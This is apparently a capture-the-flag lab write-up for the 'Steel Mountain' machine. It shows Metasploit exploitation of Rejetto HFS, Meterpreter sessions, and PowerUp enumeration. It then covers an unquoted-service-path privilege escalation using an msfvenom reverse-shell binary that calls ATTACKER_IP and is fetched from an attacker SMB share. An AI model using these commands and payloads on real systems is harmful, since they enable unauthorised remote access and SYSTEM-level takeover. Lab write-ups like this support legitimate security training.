Skip to main content

Steel Mountain

Metasploit Exploitation

  • Using: exploit/windows/http/rejetto_hfs_exec
  • PAYLOAD: windows/x64/shell/reverse_tcp
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Using URL: http://10.10.20.30:4000/c9OfS9o
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /c9OfS9o
[*] Sending stage (336 bytes) to 10.10.32.61
[*] Command shell session 1 opened (10.10.20.30:4444 -> 10.10.32.61:49198) at 2022-10-10 07:19:16 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\IdUYf.vbs' on the target

Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
          
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> whoami
STEELMOUNTAIN\bill

  • Upgrading the Session to Meterpreter
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.20.30:4433 
[*] Sending stage (200774 bytes) to 10.10.32.61
[*] Meterpreter session 2 opened (10.10.20.30:4433 -> 10.10.32.61:49200) at 2022-10-10 07:20:17 +0200
[*] Stopping exploit/multi/handler
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                               Connection
  --  ----  ----                     -----------                                               ----------
  1         shell x64/windows        Shell Banner: Microsoft Windows [Version 6.3.9600] -----  10.10.20.30:4444 -> 10.10.32.61:49198 (10.10.32.61)
  2         meterpreter x64/windows  STEELMOUNTAIN\bill @ STEELMOUNTAIN                        10.10.20.30:4433 -> 10.10.32.61:49200 (10.10.32.61)
meterpreter > getuid 
Server username: STEELMOUNTAIN\bill
meterpreter > sysinfo 
Computer        : STEELMOUNTAIN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

Enumeration

  • Enumerating the Machine using PowerUP (Powershell Script)
meterpreter > upload PowerUp.ps1
[*] uploading  : PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > powershell_shell 
PS >
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

  • The AdvancedSystemCareService9 Service has [Unquoted Service Paths] - [CanRestart = True].
  • [Unquoted Service Paths] When a Service is Created whose Executable Path contains Spaces and isn't Enclosed withing Quotes, allows a User to gain SYSTEM Privileges (Only if the Vulnerable Service is running withing the SYSTEM). This is because Windows handles the Space as Break and passes the rest of the Service PATH as an Argument.
  • [CanRestart = True] Allows us to Restart a Service on the System. The Directory of the Application is also Writable.
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

PAYLOAD

  • Generating the PAYLOAD with MSFvenom
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

  • Uploading the PAYLOAD using a Python SMB Server. After that we can replace the ASCService.exe AdvancedSystemCareService9 Service with our Reverse Shell.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare
  • It is going to ask to Overwrite the file: Yes
    • [It may be necessary to stop the Service]
C:\Program Files (x86)\IObit\Advanced SystemCare> sc stop AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare> copy \\ATTACKER_IP\LINUXSHARE\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
        1 file(s) copied.

Exploitation

  • Restarting the AdvancedSystemCareService9 Service will Start our Reverse Shell.
C:\Program Files (x86)\IObit\Advanced SystemCare> sc start AdvancedSystemCareService9

  • Before restarting the AdvancedSystemCareService9 Service we can start a Metasploit Listener.
  • Using: multi/handler
  • PAYLOAD: windows/x64/shell_reverse_tcp
  • We have System Rights: NT AUTHORITY\SYSTEM
[*] Started reverse TCP handler on 10.10.20.30:4443 
[*] Command shell session 1 opened (10.10.20.30:4443 -> 10.10.32.61:49226) at 2022-10-10 07:29:47 +0200

Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
          
C:\Windows\system32> whoami
NT AUTHORITY\SYSTEM